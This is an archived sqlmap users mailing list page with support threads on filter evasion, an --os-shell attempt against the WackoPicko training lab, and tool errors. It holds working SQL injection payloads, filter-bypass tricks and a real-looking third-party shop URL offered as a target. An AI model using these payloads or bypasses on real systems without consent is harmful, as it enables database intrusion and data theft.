sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Is it possible to change queries?

[Miroslav S. <mir...@gm...>]

--tamper=lowercase

Bye


On Fri, Aug 15, 2014 at 2:51 PM, Brandon Perry <bpe...@gm...>
wrote:

> Could you use the --eval on the param that is injectable and replace FROM
> with from?
>
>
> On Fri, Aug 15, 2014 at 1:20 AM, Michael Bachmann <mba...@gm...>
> wrote:
>
>> Hi Community
>>
>> I got a special case where i need to change the upper-case "FROM" to the
>> lower-case "from" in the payload to evade the filter. So i thought i can
>> change all occurences in queries.xml to get the correct result. But in the
>> http-requests it stays upper-case. Can someone please point me in the right
>> direction to get my problem solved? Thanks for your help.
>>
>> Best regards
>> Michael
>>
>>
>> ------------------------------------------------------------------------------
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

[Brandon P. <bpe...@gm...>]

Can you write to /tmp?


Pick a directory you KNOW you should be able to write to, and ensure you
can write to that first.

Also, maybe SELinux/AppArmor are getting in the way.


On Fri, Aug 15, 2014 at 9:52 AM, Omara <col...@ho...> wrote:

> Brandon Perry <bperry.volatile@...> writes:
>
> >
> >
> > Can you write to /tmp?
> > Instead of chowning the directory, just chmod -R 777 the dir you want to
> write the payload to, that's how many docs on the internet tell people to
> make an upload directory, for instance, writable by the web server.
> >
> > Of course, this is incorrect, but it's definitely easier than figuring
> out what your permissions really should be.
> >
> >
> > On Thu, Aug 14, 2014 at 10:34 PM, M Omara <coldhand-
> Pkb...@pu...> wrote:
> > Brandon Perry <bperry.volatile <at> ...> writes:
> > >
> > >
> > > Does the mysql user have write permissions on the web server?  A
> properly
> > configured web server where chown www-data:www-data was done, as opposed
> to
> > chmod 777 on the web dir, which is an improper configuration, will not
> allow
> > the mysql user to write to the web root.
> > You are right, the /var/www has www-data:www-data set. So I created a
> temp
> > folder inside the web root with nobody:nogroup permission but I am still
> > getting the same error. Any more configurations I need to change in
> mysql db
> > for this to work. Thank you in advance.
> >
> > -------------------------------------------------------------------------
> -----
> > _______________________________________________
> > sqlmap-users mailing listsqlmap-users-
> 5NW...@pu...https://
> lists.sourceforge.net/list
> s/listinfo/sqlmap-users
>
>
> I should be able to write to /var/www/WackoPicko/temp but I still get the
> same 404 error. I also give chmod 777 -R to /var/www/WackoPicko/users with
> no avail. Do I need to use different switches to be able to write to the
> web root?. I added the --file-dest write switch but still not working. The
> man page says --os-shell works only with writable web root directory and I
> created one but it doesn't work. However, I can get SQL shell on the
> database.
>
> sqlmap -u "http://x.x.x.x/WackoPicko/users/login.php"
> --data "username=hacker&password=password&submit=login" --os-shell -v 1
> --flush-session --file-dest=http://x.x.x.x/WackoPicko/users
>
>
>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

[Omara <col...@ho...>]

Brandon Perry <bperry.volatile@...> writes:

> 
> 
> Can you write to /tmp?
> Instead of chowning the directory, just chmod -R 777 the dir you want to 
write the payload to, that's how many docs on the internet tell people to 
make an upload directory, for instance, writable by the web server.
> 
> Of course, this is incorrect, but it's definitely easier than figuring 
out what your permissions really should be.
> 
> 
> On Thu, Aug 14, 2014 at 10:34 PM, M Omara <coldhand-
Pkb...@pu...> wrote:
> Brandon Perry <bperry.volatile <at> ...> writes:
> >
> >
> > Does the mysql user have write permissions on the web server?  A 
properly
> configured web server where chown www-data:www-data was done, as opposed 
to
> chmod 777 on the web dir, which is an improper configuration, will not 
allow
> the mysql user to write to the web root.
> You are right, the /var/www has www-data:www-data set. So I created a 
temp
> folder inside the web root with nobody:nogroup permission but I am still
> getting the same error. Any more configurations I need to change in 
mysql db
> for this to work. Thank you in advance.
> 
> -------------------------------------------------------------------------
-----
> _______________________________________________
> sqlmap-users mailing listsqlmap-users-
5NW...@pu...https://lists.sourceforge.net/list
s/listinfo/sqlmap-users


I should be able to write to /var/www/WackoPicko/temp but I still get the 
same 404 error. I also give chmod 777 -R to /var/www/WackoPicko/users with 
no avail. Do I need to use different switches to be able to write to the 
web root?. I added the --file-dest write switch but still not working. The 
man page says --os-shell works only with writable web root directory and I 
created one but it doesn't work. However, I can get SQL shell on the 
database.

sqlmap -u "http://x.x.x.x/WackoPicko/users/login.php"
--data "username=hacker&password=password&submit=login" --os-shell -v 1
--flush-session --file-dest=http://x.x.x.x/WackoPicko/users

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

[Brandon P. <bpe...@gm...>]

Can you write to /tmp?

Instead of chowning the directory, just chmod -R 777 the dir you want to
write the payload to, that's how many docs on the internet tell people to
make an upload directory, for instance, writable by the web server.

Of course, this is incorrect, but it's definitely easier than figuring out
what your permissions really should be.


On Thu, Aug 14, 2014 at 10:34 PM, M Omara <col...@ho...> wrote:

> Brandon Perry <bperry.volatile@...> writes:
>
> >
> >
> > Does the mysql user have write permissions on the web server?  A properly
> configured web server where chown www-data:www-data was done, as opposed to
> chmod 777 on the web dir, which is an improper configuration, will not
> allow
> the mysql user to write to the web root.
>
>
>
> You are right, the /var/www has www-data:www-data set. So I created a temp
> folder inside the web root with nobody:nogroup permission but I am still
> getting the same error. Any more configurations I need to change in mysql
> db
> for this to work. Thank you in advance.
>
>
>
>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Is it possible to change queries?

[Brandon P. <bpe...@gm...>]

Could you use the --eval on the param that is injectable and replace FROM
with from?


On Fri, Aug 15, 2014 at 1:20 AM, Michael Bachmann <mba...@gm...>
wrote:

> Hi Community
>
> I got a special case where i need to change the upper-case "FROM" to the
> lower-case "from" in the payload to evade the filter. So i thought i can
> change all occurences in queries.xml to get the correct result. But in the
> http-requests it stays upper-case. Can someone please point me in the right
> direction to get my problem solved? Thanks for your help.
>
> Best regards
> Michael
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] Is it possible to change queries?

[Michael B. <mba...@gm...>]

Hi Community

I got a special case where i need to change the upper-case "FROM" to the
lower-case "from" in the payload to evade the filter. So i thought i can
change all occurences in queries.xml to get the correct result. But in the
http-requests it stays upper-case. Can someone please point me in the right
direction to get my problem solved? Thanks for your help.

Best regards
Michael

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

[M O. <col...@ho...>]

Brandon Perry <bperry.volatile@...> writes:

> 
> 
> Does the mysql user have write permissions on the web server?  A properly
configured web server where chown www-data:www-data was done, as opposed to
chmod 777 on the web dir, which is an improper configuration, will not allow
the mysql user to write to the web root.



You are right, the /var/www has www-data:www-data set. So I created a temp
folder inside the web root with nobody:nogroup permission but I am still
getting the same error. Any more configurations I need to change in mysql db
for this to work. Thank you in advance.

Re: [sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

[Brandon P. <bpe...@gm...>]

Does the mysql user have write permissions on the web server?  A properly
configured web server where chown www-data:www-data was done, as opposed to
chmod 777 on the web dir, which is an improper configuration, will not
allow the mysql user to write to the web root.


On Wed, Aug 13, 2014 at 6:47 PM, M Omara <col...@ho...> wrote:

> I can't get to upload the stager file on the OWASPbwa document root
> (/var/wwww/WackoPicko/users). I am not sure how to troubleshoot this issue.
> Any help on the issue will be appreciated. Thank you.
>
> root@kali:~# sqlmap -u "http://192.168.0.8/WackoPicko/users/login.php"
> --data "username=hacker&password=password&submit=login" --os-shell -v 1
> --flush-session
>
>     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 11:22:25
>
> [11:22:25] [INFO] testing connection to the target url
> [11:22:25] [INFO] heuristics detected web page charset 'None'
> sqlmap got a 303 redirect to
> 'http://192.168.0.8:80/WackoPicko/users/home.php'. Do you want to follow?
> [Y/n] Y
> redirect is a result of a POST request. Do you want to resend original POST
> data to a new location? [Y/n] n
> [11:22:32] [INFO] heuristics detected web page charset 'ascii'
> [11:22:32] [INFO] testing if the url is stable, wait a few seconds
> [11:22:33] [WARNING] POST parameter 'username' does not appear dynamic
> [11:22:33] [WARNING] heuristic (parsing) test shows that POST parameter
> 'username' might not be injectable
> [11:22:33] [INFO] testing for SQL injection on POST parameter 'username'
> [11:22:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [11:22:33] [WARNING] reflective value(s) found and filtering out
> [11:22:33] [INFO] POST parameter 'username' is 'AND boolean-based blind -
> WHERE or HAVING clause' injectable
> [11:22:34] [INFO] heuristic (extended) test shows that the back-end DBMS
> could be 'MySQL'
> do you want to include all tests for 'MySQL' ignoring provided level (1)
> and
> risk (1)? [Y/n] n
> [11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
> clause'
> [11:22:45] [INFO] POST parameter 'username' is 'MySQL >= 5.0 AND
> error-based
> - WHERE or HAVING clause' injectable
> [11:22:45] [INFO] testing 'MySQL inline queries'
> [11:22:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [11:22:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [11:22:55] [INFO] POST parameter 'username' is 'MySQL > 5.0.11 AND
> time-based blind' injectable
> [11:22:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
> [11:22:56] [INFO] automatically extending ranges for UNION query injection
> technique tests as there is at least one other potential injection
> technique
> found
> [11:22:56] [INFO] ORDER BY technique seems to be usable. This should reduce
> the time needed to find the right number of query columns. Automatically
> extending the range for current UNION query injection technique test
> [11:22:56] [INFO] target url appears to have 9 columns in query
> injection not exploitable with NULL values. Do you want to try with a
> random
> integer value for option '--union-char'? [Y/n] Y
> [11:23:01] [WARNING] if UNION based SQL injection is not detected, please
> consider forcing the back-end DBMS (e.g. --dbms=mysql)
> [11:23:01] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
> POST parameter 'username' is vulnerable. Do you want to keep testing the
> others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 81 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: username
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: username=hacker' AND 3230=3230 AND
> 'YAZW'='YAZW&password=password&submit=login
>
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: username=hacker' AND (SELECT 1330 FROM(SELECT
> COUNT(*),CONCAT(0x3a70636d3a,(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0
> END)),0x3a7364723a,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS
> GROUP BY x)a) AND 'Dris'='Dris&password=password&submit=login
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: username=hacker' AND SLEEP(5) AND
> 'kgtY'='kgtY&password=password&submit=login
> ---
> [11:23:05] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
> web application technology: PHP 5.3.2, Apache 2.2.14
> back-end DBMS: MySQL 5.0
> [11:23:05] [INFO] going to use a web backdoor for command prompt
> [11:23:05] [INFO] fingerprinting the back-end DBMS operating system
> [11:23:05] [INFO] the back-end DBMS operating system is Linux
> [11:23:05] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] JSP
> [4] PHP (default)
> |> 4
> [11:23:08] [WARNING] unable to retrieve automatically the web server
> document root
> do you want to provide a text file with a list of directories to try?
> [y/N] N
> please provide the web server document root [/var/www/]:
> /var/www/WackoPicko/users
> [11:23:26] [WARNING] unable to retrieve automatically any web server path
> please provide additional comma separated file paths to try to upload the
> agent inside the possible document:
> [11:23:32] [WARNING] unable to upload the file stager on
> '/var/www/WackoPicko/users'
> [11:23:32] [WARNING] unable to upload the file stager on
> '/var/www/WackoPicko/users/WackoPicko/users'
> [11:23:32] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 2 times
> [11:23:32] [INFO] fetched data logged to text files under './output/
> 192.168.0.8'
>
> [*] shutting down at 11:23:32
>
>
>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] SQLMAP throws 404 error - unable to upload the file stager

[M O. <col...@ho...>]

I can't get to upload the stager file on the OWASPbwa document root
(/var/wwww/WackoPicko/users). I am not sure how to troubleshoot this issue.
Any help on the issue will be appreciated. Thank you.

root@kali:~# sqlmap -u "http://192.168.0.8/WackoPicko/users/login.php"
--data "username=hacker&password=password&submit=login" --os-shell -v 1
--flush-session

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program

[*] starting at 11:22:25

[11:22:25] [INFO] testing connection to the target url
[11:22:25] [INFO] heuristics detected web page charset 'None'
sqlmap got a 303 redirect to
'http://192.168.0.8:80/WackoPicko/users/home.php'. Do you want to follow?
[Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST
data to a new location? [Y/n] n
[11:22:32] [INFO] heuristics detected web page charset 'ascii'
[11:22:32] [INFO] testing if the url is stable, wait a few seconds
[11:22:33] [WARNING] POST parameter 'username' does not appear dynamic
[11:22:33] [WARNING] heuristic (parsing) test shows that POST parameter
'username' might not be injectable
[11:22:33] [INFO] testing for SQL injection on POST parameter 'username'
[11:22:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:22:33] [WARNING] reflective value(s) found and filtering out
[11:22:33] [INFO] POST parameter 'username' is 'AND boolean-based blind -
WHERE or HAVING clause' injectable 
[11:22:34] [INFO] heuristic (extended) test shows that the back-end DBMS
could be 'MySQL' 
do you want to include all tests for 'MySQL' ignoring provided level (1) and
risk (1)? [Y/n] n
[11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause'
[11:22:45] [INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based
- WHERE or HAVING clause' injectable 
[11:22:45] [INFO] testing 'MySQL inline queries'
[11:22:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:22:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:22:55] [INFO] POST parameter 'username' is 'MySQL > 5.0.11 AND
time-based blind' injectable 
[11:22:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:22:56] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other potential injection technique
found
[11:22:56] [INFO] ORDER BY technique seems to be usable. This should reduce
the time needed to find the right number of query columns. Automatically
extending the range for current UNION query injection technique test
[11:22:56] [INFO] target url appears to have 9 columns in query
injection not exploitable with NULL values. Do you want to try with a random
integer value for option '--union-char'? [Y/n] Y
[11:23:01] [WARNING] if UNION based SQL injection is not detected, please
consider forcing the back-end DBMS (e.g. --dbms=mysql) 
[11:23:01] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 81 HTTP(s)
requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=hacker' AND 3230=3230 AND
'YAZW'='YAZW&password=password&submit=login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=hacker' AND (SELECT 1330 FROM(SELECT
COUNT(*),CONCAT(0x3a70636d3a,(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0
END)),0x3a7364723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) AND 'Dris'='Dris&password=password&submit=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=hacker' AND SLEEP(5) AND
'kgtY'='kgtY&password=password&submit=login
---
[11:23:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:23:05] [INFO] going to use a web backdoor for command prompt
[11:23:05] [INFO] fingerprinting the back-end DBMS operating system
[11:23:05] [INFO] the back-end DBMS operating system is Linux
[11:23:05] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
|> 4
[11:23:08] [WARNING] unable to retrieve automatically the web server
document root
do you want to provide a text file with a list of directories to try? [y/N] N
please provide the web server document root [/var/www/]:
/var/www/WackoPicko/users
[11:23:26] [WARNING] unable to retrieve automatically any web server path
please provide additional comma separated file paths to try to upload the
agent inside the possible document: 
[11:23:32] [WARNING] unable to upload the file stager on
'/var/www/WackoPicko/users'
[11:23:32] [WARNING] unable to upload the file stager on
'/var/www/WackoPicko/users/WackoPicko/users'
[11:23:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[11:23:32] [INFO] fetched data logged to text files under './output/192.168.0.8'

[*] shutting down at 11:23:32

Re: [sqlmap-users] Filter on period

[Brandon P. <bpe...@gm...>]

I am not sure if sqlmap is capable of this, but I have found inserting the
filtered character in the middle of its hex-encoded counterpart (in your
case %2.E for instance) can bypass similar filters.

This only works if the param is url-decoded after the filter is performed
on the string.


On Sun, Aug 10, 2014 at 3:57 PM, <du...@al...> wrote:

> So I did a little test on my site where I simply filtered out "."
> (period) in incoming GET parameters that were vulnerable to SQLi.
> sqlmap then failed to list databases, tables and columns.
> Since INFORMATION_SCHEMA.TABLES would become INFORMATION_SCHEMATABLES
> and fail with a "Table testdb.INFORMATION_SCHEMATABLES doesn't exist".
> Can sqlmap bypass this somehow? I have played around with tamper a bit,
> but haven't bypassed it yet (haven't tried all tamper scripts though,
> only some that sounded logical to try).
>
> Note: I don't see this as a means to protect my sites in the future.
> It's just a little late Sunday night sqlmap fun :)
>
> Cheers!
>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] Filter on period

[<du...@al...>]

So I did a little test on my site where I simply filtered out "." 
(period) in incoming GET parameters that were vulnerable to SQLi.
sqlmap then failed to list databases, tables and columns.
Since INFORMATION_SCHEMA.TABLES would become INFORMATION_SCHEMATABLES 
and fail with a "Table testdb.INFORMATION_SCHEMATABLES doesn't exist".
Can sqlmap bypass this somehow? I have played around with tamper a bit, 
but haven't bypassed it yet (haven't tried all tamper scripts though, 
only some that sounded logical to try).

Note: I don't see this as a means to protect my sites in the future. 
It's just a little late Sunday night sqlmap fun :)

Cheers!

Re: [sqlmap-users] UNKOWN charset

[Miroslav S. <mir...@gm...>]

Hi.

It looks like you are using option --charset (but in wrong way). It looks
like you've used --charset http://www.sukipara.net/shop/shop.php?idA7,
which is wrong way how to use it.

Bye


On Thu, Jul 31, 2014 at 8:11 PM, <whi...@ma...> wrote:

> UNKOWN charset
>
> http://www.sukipara.net/shop/shop.php?idA7
>
>
> ------------------------------------------------------------------------------
> Infragistics Professional
> Build stunning WinForms apps today!
> Reboot your WinForms applications with our WinForms controls.
> Build a bridge from your legacy apps to the future.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=153845071&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] pls help me to solve this problem....unhandled exception in sqlmap

[Brandon P. <bpe...@gm...>]

Looks like a permissions issue on the filesystem, not an issue with sqlmap,
no?


OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'


On Sun, Aug 3, 2014 at 5:51 AM, Santhosh Kumar <sk8...@gm...> wrote:

> pls help me to solve this problem....unhandled exception in sqlmap
> Add star  Santhosh Kumar<sk8...@gm...>    Sun, Aug 3, 2014 at 4:12
> PM
> To: sql...@li...
> Reply | Reply to all | Forward | Print | Delete | Show original
> The error shows as:
>
>
> [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with
> the latest development version from the GitHub repository. If the
> exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ******************************************
> -D ****** -T *********** -C ********** --dump
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap", line 95, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in start
>     setupTargetEnv()
>   File "/usr/share/sqlmap/lib/core/target.py", line 565, in setupTargetEnv
>     _createTargetDirs()
>   File "/usr/share/sqlmap/lib/core/target.py", line 521, in
> _createTargetDirs
>     _createDumpDir()
>   File "/usr/share/sqlmap/lib/core/target.py", line 465, in _createDumpDir
>     os.makedirs(conf.dumpPath, 0755)
>   File "/usr/lib/python2.7/os.py", line 150, in makedirs
>     makedirs(head, mode)
>   File "/usr/lib/python2.7/os.py", line 150, in makedirs
>     makedirs(head, mode)
>   File "/usr/lib/python2.7/os.py", line 157, in makedirs
>     mkdir(name, mode)
> OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'
>
> [*] shutting down at 16:08:23
>
>
>
>
>
> Pls kindly help me....
> Thank you
>
> On 8/3/14, Santhosh Kumar <sk8...@gm...> wrote:
> > The error shows as:
> >
> >
> > [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with
> > the latest development version from the GitHub repository. If the
> > exception persists, please send by e-mail to
> > 'sql...@li...' or open a new issue at
> > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> > following text and any information required to reproduce the bug. The
> > developers will try to reproduce the bug, fix it accordingly and get
> > back to you.
> > sqlmap version: 1.0-dev
> > Python version: 2.7.3
> > Operating system: posix
> > Command line: ./sqlmap -u ******************************************
> > -D ****** -T *********** -C ********** --dump
> > Technique: None
> > Back-end DBMS: None (identified)
> > Traceback (most recent call last):
> >   File "./sqlmap", line 95, in main
> >     start()
> >   File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in
> start
> >     setupTargetEnv()
> >   File "/usr/share/sqlmap/lib/core/target.py", line 565, in
> setupTargetEnv
> >     _createTargetDirs()
> >   File "/usr/share/sqlmap/lib/core/target.py", line 521, in
> > _createTargetDirs
> >     _createDumpDir()
> >   File "/usr/share/sqlmap/lib/core/target.py", line 465, in
> _createDumpDir
> >     os.makedirs(conf.dumpPath, 0755)
> >   File "/usr/lib/python2.7/os.py", line 150, in makedirs
> >     makedirs(head, mode)
> >   File "/usr/lib/python2.7/os.py", line 150, in makedirs
> >     makedirs(head, mode)
> >   File "/usr/lib/python2.7/os.py", line 157, in makedirs
> >     mkdir(name, mode)
> > OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'
> >
> > [*] shutting down at 16:08:23
> >
> >
> >
> >
> >
> > Pls kindly help me....
> > Thank you
> >
>
>
> ------------------------------------------------------------------------------
> Want fast and easy access to all the code in your enterprise? Index and
> search up to 200,000 lines of code with a free copy of Black Duck
> Code Sight - the same software that powers the world's largest code
> search on Ohloh, the Black Duck Open Hub! Try it now.
> http://p.sf.net/sfu/bds
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] pls help me to solve this problem....unhandled exception in sqlmap

[Santhosh K. <sk8...@gm...>]

pls help me to solve this problem....unhandled exception in sqlmap
Add star  Santhosh Kumar<sk8...@gm...>	Sun, Aug 3, 2014 at 4:12 PM
To: sql...@li...
Reply | Reply to all | Forward | Print | Delete | Show original
The error shows as:


[CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with
the latest development version from the GitHub repository. If the
exception persists, please send by e-mail to
'sql...@li...' or open a new issue at
'https://github.com/sqlmapproject/sqlmap/issues/new' with the
following text and any information required to reproduce the bug. The
developers will try to reproduce the bug, fix it accordingly and get
back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u ******************************************
-D ****** -T *********** -C ********** --dump
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap", line 95, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in start
    setupTargetEnv()
  File "/usr/share/sqlmap/lib/core/target.py", line 565, in setupTargetEnv
    _createTargetDirs()
  File "/usr/share/sqlmap/lib/core/target.py", line 521, in _createTargetDirs
    _createDumpDir()
  File "/usr/share/sqlmap/lib/core/target.py", line 465, in _createDumpDir
    os.makedirs(conf.dumpPath, 0755)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 157, in makedirs
    mkdir(name, mode)
OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'

[*] shutting down at 16:08:23





Pls kindly help me....
Thank you

On 8/3/14, Santhosh Kumar <sk8...@gm...> wrote:
> The error shows as:
>
>
> [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with
> the latest development version from the GitHub repository. If the
> exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ******************************************
> -D ****** -T *********** -C ********** --dump
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap", line 95, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in start
>     setupTargetEnv()
>   File "/usr/share/sqlmap/lib/core/target.py", line 565, in setupTargetEnv
>     _createTargetDirs()
>   File "/usr/share/sqlmap/lib/core/target.py", line 521, in
> _createTargetDirs
>     _createDumpDir()
>   File "/usr/share/sqlmap/lib/core/target.py", line 465, in _createDumpDir
>     os.makedirs(conf.dumpPath, 0755)
>   File "/usr/lib/python2.7/os.py", line 150, in makedirs
>     makedirs(head, mode)
>   File "/usr/lib/python2.7/os.py", line 150, in makedirs
>     makedirs(head, mode)
>   File "/usr/lib/python2.7/os.py", line 157, in makedirs
>     mkdir(name, mode)
> OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'
>
> [*] shutting down at 16:08:23
>
>
>
>
>
> Pls kindly help me....
> Thank you
>

[sqlmap-users] pls help me to solve this problem....unhandled exception in sqlmap

[Santhosh K. <sk8...@gm...>]

The error shows as:


[CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with
the latest development version from the GitHub repository. If the
exception persists, please send by e-mail to
'sql...@li...' or open a new issue at
'https://github.com/sqlmapproject/sqlmap/issues/new' with the
following text and any information required to reproduce the bug. The
developers will try to reproduce the bug, fix it accordingly and get
back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u ******************************************
-D ****** -T *********** -C ********** --dump
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap", line 95, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in start
    setupTargetEnv()
  File "/usr/share/sqlmap/lib/core/target.py", line 565, in setupTargetEnv
    _createTargetDirs()
  File "/usr/share/sqlmap/lib/core/target.py", line 521, in _createTargetDirs
    _createDumpDir()
  File "/usr/share/sqlmap/lib/core/target.py", line 465, in _createDumpDir
    os.makedirs(conf.dumpPath, 0755)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 157, in makedirs
    mkdir(name, mode)
OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'

[*] shutting down at 16:08:23





Pls kindly help me....
Thank you

[sqlmap-users] UNKOWN charset

[<whi...@ma...>]

http://www.sukipara.net/shop/shop.php?id=417

Re: [sqlmap-users] sql-shell option

[Brandon P. <bpe...@gm...>]

There is a root MySQL user that is disparate from the root system user.


